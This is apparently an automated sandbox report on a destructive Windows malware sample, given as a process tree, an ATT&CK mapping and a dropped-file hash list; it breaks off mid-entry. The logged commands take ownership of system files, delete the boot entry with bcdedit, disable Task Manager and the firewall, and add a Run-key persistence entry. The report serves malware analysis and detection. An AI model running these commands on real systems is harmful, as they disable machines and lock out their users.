        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:2900
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:4908
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:8120
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:2776
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6104
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:8820
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:9156
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8452
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:12064
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:11364
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:12344
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:12608
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:13008
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6284
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:12924
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:5928
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:12660
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:7868
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:7896
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:8000
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:8128
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:7540
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\82B8.tmp\82B9.tmp\82BA.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:3480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:7284
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:4268
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:7012
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:7828
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:7808
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3740
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1796
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:5140
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        
        PID:648
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:6992
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:3244
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:8136
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:4412
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:7952
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:2748
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:7828
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:1480
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9504
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9720
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9912
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10112
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:4228
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:5776
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:4548
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10248
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:10404
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10592
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:11120
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\861E.tmp\861F.tmp\8620.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:11372
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8436
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:11416
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:11660
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:11904
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:6852
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C3C3.tmp\C3C4.tmp\C3C5.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:12324
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:11076
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:12380
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:12636
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:13052
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:11540
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:7400
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:7608
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:7164
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:3604
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:4404
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:5340
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:7524
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:1844
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:8052
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        
        PID:6504
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:6992
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:4432
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:8180
    - - C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        5⤵
        
        PID:4880
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        5⤵
        Modifies file permissions
        
        PID:7716
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:3628
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:3352
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:3904
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    PID:2192
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:4560
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:3332
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:4188
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:860
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:4452
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:1404
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {current}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2868
- - C:\Windows\system32\msg.exe
    msg * Virus detectado
    3⤵
    PID:3272
- - C:\Windows\system32\msg.exe
    msg * Virus detectado
    3⤵
    PID:4944
- - C:\Windows\system32\msg.exe
    msg * Has sido hackeado!
    3⤵
    PID:748
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\drivers" /r
    3⤵
    - Possible privilege escalation attempt
    PID:4624
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\drivers" /reset /t /c /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5140
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
    3⤵
    - Views/modifies file attributes
    PID:7640

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x380 0x4b4
1⤵
PID:3736

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:2868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:1924

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:2112

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:3704

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5964

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6008

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6476

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6680

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7116

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6924

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7712

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6552

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7532

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8652

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8708

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5700

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10148

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9460

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:3824

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8896

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:12020

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10132

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8100

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:4656

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:12896

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:12320

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6868

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:12372

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8328

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe

Filesize
112KB

MD5
81a7a946456f1f6dae4715b1feb72ed0

SHA1
af83b938017efd53f95671adc0c6d2aa1088d38e

SHA256
690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408

SHA512
a1ec5c6b1ebb014aa60d0242e147ebbbadd2aff2a0e653b99f440f8d25bb01ee49cddcf6ad608c0adc8a5efc784ff2c949036b447da2912ccc6e684c2cc0e692

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs

Filesize
63B

MD5
4cb4efde0d2476b32d5a347a52df6c1b

SHA1
d2b3d042dfc64cc15b41b83b6f0252497a515e95

SHA256
1db6458800616839e864831147cc6d91845825e365925151f649b5d998152273

SHA512
1a676aec628275f5812bc99f7055713986579304df42328559b7a0adeb99601a2a680144a0f3b1685a0126c034cbf9f75ac89cb5cd1c8ca87f7e68824771ebce

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf

Filesize
74B

MD5
b39df423c6e5978065a9a8ec4879a3b4

SHA1
96441a7a7d8090f7a96a1160f539531f66568e88

SHA256
12a5135510016abcfe1192aceb6fec42634346661d778d68be1debaa3d75e967

SHA512
2d583fcae1ec73f836c5b66b8b1337bb4250a8230073de96d501a4fab5f522b75599ac2a1fcf1457a841d8c84bcccb88feade82f49357b28345c63d9526cfeb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\B14E.tmp\B14F.tmp\B160.bat

Filesize
23KB

MD5
afb3843724a58bbbb53fd12a8f42d8e6

SHA1
0835bbceeb20027752c05e48b1b7c4571611f32f

SHA256
53f749148a1e78cf315f16934350a13113705b95d2a375573c7007dfeaba047d

SHA512
8c8ba2b13e6fc63ddb7205ef223a2cf954fdcc8737ee031533d916535df401581dad3c3bd53416340e12569d9ad505051a63edc4f77905dbd96f94eadef84fad

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs

Filesize
57B

MD5
5420b2137427b07b4d6a585ae3b69e08

SHA1
feb511d0b40064ab8a491caf699f5959bc9d4716

SHA256
ae3ab245b4001b487205480988a1aa775de104faf0e5d9c43dd3d1cf285196a1

SHA512
2d5e64f315b8d72e7ff178042cb131baf0d982e74c09455911358ab3552e6e5919ac5f567b1cf31f91ad5613f2b91c5eff5e251e014c230490e4a323da7a7946

Download Submit
C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd

Filesize
30B

MD5
c1d1d009fa868b67fe8ae820ae3a7564

SHA1
5908963134b1dc6b00cd335f42e7721f668f832a

SHA256
721dad6e2ab061b3d306bf39656fc32e82b007b43a7ea5367b69b2a62e51af49

SHA512
671f69f2f037920c78269ad9322f517b10e169d62d8b16aff899e55c66a0560cc5df389e5b2ee1139bef4cfe86263ceadbb705fc7f8a4296430a2a5b46d1eaab

Download Submit
C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd

Filesize
60B

MD5
a12f4d34a99c14c98463e9779ae4c008

SHA1
9677e26fc0711879b5c7f12eadfa6727e4cc63c7

SHA256
9da85b8516711c1e92ab0206908d95699bac1280b1cadb3cef8a554624e95f2b

SHA512
fdc46135ef84c5c3ede54cd09208546052699ed54c1c39c6d409d7a3441a902bb9871452af1f82ce1600c223b2720c25bb6d9194ac80b15ff2955288a0c0a1da

Download Submit
C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd

Filesize
90B

MD5
acba0fe3a48e7297440c136aaf975e44

SHA1
3eafa0722acbafa8cb61eaf1a93d51563c5ec987

SHA256
549bc4d8027b5b82b9b73e89f7c1549d4690c9bea4c13dfaa210a737718b73da

SHA512
cc216231aa16c41b963e1b732f2a5e49ced2efd409137e5c6fd54f4fb52092e951825aba4b5a0b9486c0695336e7b451c849a1422a8741c94ac9aaa1e2cdc4dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd

Filesize
120B

MD5
9512cf977fd3cfacad693e88bc62cc7e

SHA1
006b8a3d5c348e3c2963da33e5b8483c2d9badd1

SHA256
b7f4d2db7506132f6b164931675e8bdc63abdecdc035385ede0e667b5b60945e

SHA512
83ebe1086aa48f9a8a3222f43e5bf3021c1841852d0876f76557b22397d9ece8370fd5cef6717dae2031196246eafe0eb622af65ee1bf1ca7adb4974f5750896

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs

Filesize
71B

MD5
c50b8418d9f7ec5980f0bcd9bca4a735

SHA1
d00d3064b043e6cb78476d7820998d9b89f9fdc7

SHA256
48ee941955387e29c12380d852a363bdf22ef49897c0bd814aaeacba6bc852aa

SHA512
0b71f8c7bb3d9be0017dd30cb25500df4a04d77234c9ed36222fda37af1a2b66dc8fccd2fe8c27f164bef7b892e9a6b1745469623cb71f3c3a1700509165f6f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp

Filesize
14KB

MD5
1bad8558f3516ac2a33bda18398ae7bd

SHA1
ca6e3cdc52e209f639a4e260dd21602baeb4f009

SHA256
f00f4cfb8ff634c4eba20ba674b1906f82c35f7dfc933009ae30203749cef8ee

SHA512
e3b245dfe1b550e2a7ee96952f67039d45dd0d4db1e09ecb4e66516d68a8e4b69e7b607481fa49d0b92557007eee4dbe46276325c3304775202f3db16617a3ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp

Filesize
1KB

MD5
38f61bfd7f58258e0f87d8db10451bd2

SHA1
cbac9911c4d8c900b1e7e0fcfd8c88e6b6a68184

SHA256
36276e86c0c66c9b4c49cdcdd966305066cf3ef2b6ed550dfc0af3b20a1fbfed

SHA512
734cc1333ede2e06e01967d933c0605794b1ea07388eaa45730f735fc9504afcc7625b51252d965f9013b4bd3ed2651ad67f83825b994db47ca3ad50ed003897

Download Submit
C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp

Filesize
3KB

MD5
692055ef0d0f83548d3eadf769ffda3e

SHA1
39daef14f3ad7641067b10b071814a2d285138cc

SHA256
16dac79a3d565ec9bab7c49aa729872bca80bb8ea082155fe2704e7ab1e2bab2

SHA512
d8ce668bbc7c637e8e547a16c7d97dee27ed57e782e31c40b11d0d30ae0363e3d3b9180c849765209199d16a63209786f9d8963883ddc527e8dca4a7e01852b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp

Filesize
5KB

MD5
c7745dd278526ca2f959140dec2bc7e2

SHA1
0984da5c362c2db7dca29778dac11c15452dbe50

SHA256
2fff73b9b3acade233e13a0ad4282fd294d2bf1b952ec767ce6c32a028fa4ed0

SHA512
52b8acbd5dd6d5e9636a7643ff9ee9f442d591c56613c171ba1f18d5a36e0442b63d26b97fb1c7f5b6ab0eafb5e5bb88990a37e4239fa58faa3353dce1f6367e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
564B

MD5
de03d0b3b85643b033710b2831264c4e

SHA1
0fc279909ddf2b27360db5de557d9bfbd21f2943

SHA256
f07b1deca175e337ff0491321ba66d6d33b6a5d46ca098392f103155eab3b41a

SHA512
02a07a1df53a6e610684a26991e1e96ff38acd3434159ad5de68d2307165588c7f9b40eca9300f634823e9c7dc6dd4f4b13a759b4a320fa3b72917a7637a8c06

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
188B

MD5
a5fa08e54b3818a7ee1d88ea2662d0ee

SHA1
bca38f9f1f103beb93b6ba7451b848edba0be8ee

SHA256
ca105f2e9b178394fe18c299ccb1234d42caa587f090f73ee12bee04fdb04f7b

SHA512
80583a90d237c08514d9113ed1115a0d6e36ca7f754b1a9aaf5b560f78a7885831b5258d0f25705e2701cb15d64d7f99beb7f731ec7d61d4b648fe0ffbb1f782

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
575B

MD5
1a2de85bdca15ebfbc92db6bea6379d6

SHA1
3aee55354985575fe30dabf1edec68f10c353a23

SHA256
d248f23c7b7ef693802bf1d31737e9c4f6f8353fa0669151dba546639257c57d

SHA512
38ba939a0eb19135b9a6aa0b44d88a2c8fda4257c36a1a24f118694acbf082ffa557de43b3a1ed52d63ba3fd03ef35edc6bb8eecdeb7a3f77f84d4aea92a3a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
589B

MD5
eaee8e971d811ae74783d08c4efd2dcd

SHA1
3374184838bc83bbb06571c334ede39867d86a01

SHA256
84bd772132c0111487018bc4270d6ead4dd963d5b90b1c7b89f7a3e613d70850

SHA512
fed0aa6748edc84e3bb25c8fd8c28f92db580ed4a3fbc0249f505e8d838fae67ff717a631a71871f3666222f1b2074f29886f527b68eed4271c6be050b0b0c9e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
598B

MD5
bf24a2f9824d2387725ab3f3ba554f12

SHA1
7bf0ab5638cea7769cb960402f58304437925be0

SHA256
8bd0c609fc8bf19a6f53ed4226b6ceb0ea35993bd4e0e054a2b08a699a0f7f2d

SHA512
924345c8dc127528e60ab4c761cf5e7c194c97ccf78fe0138fc05ab09062e8748de75eaa01827bf29f42695612d95a45acccba5a53643ce2ef40cf38b906f40c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
635B

MD5
c34a9ebd129026f895edc91235728bee

SHA1
626e4511cc6685442e7228b6451e056db41f66f7

SHA256
15685e0a8c6c9223ef3d0bc1a1f7912f1659022bf3819a20db368bd4f7e31e38

SHA512
1b92cfff2fa4a62f04fa86e63038dcdbfb1a950672e11866b6f35c7a51c525e3d06c18747db9709bf5175d234af974ed98c5c9afaa7fccd6bde3acb2276c0e43

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
709B

MD5
577c05d816c842cf3d04a895cf234adf

SHA1
7a20ebee7e9d6f5ceb532dfac20913346d382d75

SHA256
5d28b86bb470ebb0bcbb2dfe1a843ba7250dd631b805b757ec4cd40842a0d7fc

SHA512
90089f254674c293939e950260140a23020f2f205712df7361e40cd69f8fe15554ffab24b330e31126b5b788c057e14cd1490754977790688356c623ac047254

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
752B

MD5
735e8e1b5a3a291f0a6376b475a14d5e

SHA1
daa694fc72b0c012bc3e9ba5af76de82288f3559

SHA256
eb4cba4d58b2e0aa03d9cbf966f48406b87e5e37392f84447d85f605028e3d5a

SHA512
f9792b52afb2bbc19e1aad167e1929008275a97cf6644ef655069a79f0ae172a0380ac0be319079b906f8ca5a39d0914ab836473dcba68ac312b3845476f5a96

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
4KB

MD5
c93196af3b5f4aafa96a65a2f97eb568

SHA1
cb1b31efb879b242b32152b1d29f2c79260139fc

SHA256
178047b37e9a1c2202f6df012b914d8419deaf9ab3149a2d30e0265a1207e362

SHA512
8615fc5c356ed40674184ba512539a2e23375aca2e54aa008750fa28871733451df6a9c4aec8fae8e6a37bb93d9a23fbacc7e92c010edbf588f71a2cbd1b55b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
17KB

MD5
06afc31a50e893012a51154d0ab83c8f

SHA1
42e399fc96179da06b5d482c1bfd7b88bcf236c6

SHA256
f9f8345f47318407ccceeb12a3e6e30d6cfc47ffd758a5f1715cf8705fd3630c

SHA512
9dfbc0d5bf485d5708a4b5680bdc4141d4fe941f0a425faef73a5ca8ddf380b9652057af11d35aefb440d049b4ac329014f57425be152ee522b2472ff7f7b976

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
17KB

MD5
57050d95ebaacd97639bee511dfe6153

SHA1
d38008e3850fac0b56121cb75597a4321b6faa51

SHA256
a9aca26fed27e7954d62b92619e7dc45d2a1c3c3b3d37f79bfa35b7010cac04d

SHA512
1b0dd675ef0dcc08c2170688aa8e43685a539bdf371aea02f1dee07d03667b2e9f960c5384533e262cf5524b12b03621467d698b7a2833787d6809f92e97e671

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
18KB

MD5
73b1e986b8d15ed570e0473b08841088

SHA1
e83709d40f86de081c3c05a8b79494d323018dc8

SHA256
2d44ebc7772d41c26411f984a2188f2473df10ead3226ec3c27a31c775719f1f

SHA512
